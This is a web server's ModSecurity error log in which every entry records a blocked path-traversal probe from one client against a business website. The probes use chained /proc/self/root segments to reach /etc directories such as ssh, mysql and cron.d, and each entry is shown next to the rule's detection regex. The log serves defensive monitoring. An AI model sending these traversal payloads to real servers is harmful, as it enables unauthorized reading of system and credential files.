[Mon Mar 16 09:41:54.175387 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.243.203:55738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6knbQATo66fKoS7w6awAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:55.323066 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:55746] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6k9SswJuvopo3lOhNeAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:57.027682 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.243.203:55762] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6lJqj1wV0Si-OkefXLQAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:41:58.418286 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.243.203:55770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6ltSswJuvopo3lOhNfAAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:00.680673 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.243.203:55782] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6mHjZBu2q05ozVU9DhQAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:02.024126 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:56746] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6mglT9VtDQc7bgUyZwAAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:03.393015 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:56752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6m3jZBu2q05ozVU9DiAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:04.755150 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:56766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6nBXjF1vJNtV6CWrmZQAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:06.103472 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:56772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6ntSswJuvopo3lOhNfQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:07.437517 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:56778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6n7ysWC90G-1nBrAy_wAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:08.581679 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:56794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6oBXjF1vJNtV6CWrmZwAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:11.186317 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.243.203:56804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6o3bQATo66fKoS7w6cwAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:12.494363 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:60056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6pP9ocpUE4ed4uDzakQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:13.801554 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.243.203:60066] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6pZqj1wV0Si-OkefXNgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:15.078542 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:60078] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6p7ABkC4fWIHEf8HYfAAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:16.263555 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:60088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6qP9ocpUE4ed4uDzalQAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:42:17.539747 2026] [:error] [pid 21533:tid 140411565680384] [client 74.7.243.203:60104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6qXjZBu2q05ozVU9DjAAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:18.858927 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.243.203:60116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6qhXjF1vJNtV6CWrmaQAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:20.035450 2026] [:error] [pid 32654:tid 140411658000128] [client 74.7.243.203:60124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6rAlT9VtDQc7bgUyZyQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:21.296665 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:50384] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6rY6lpbStxTqkSktcoQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:22.582871 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:50386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6ro6lpbStxTqkSktcowAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:42:23.887351 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:50402] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf6r7ABkC4fWIHEf8HYfwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
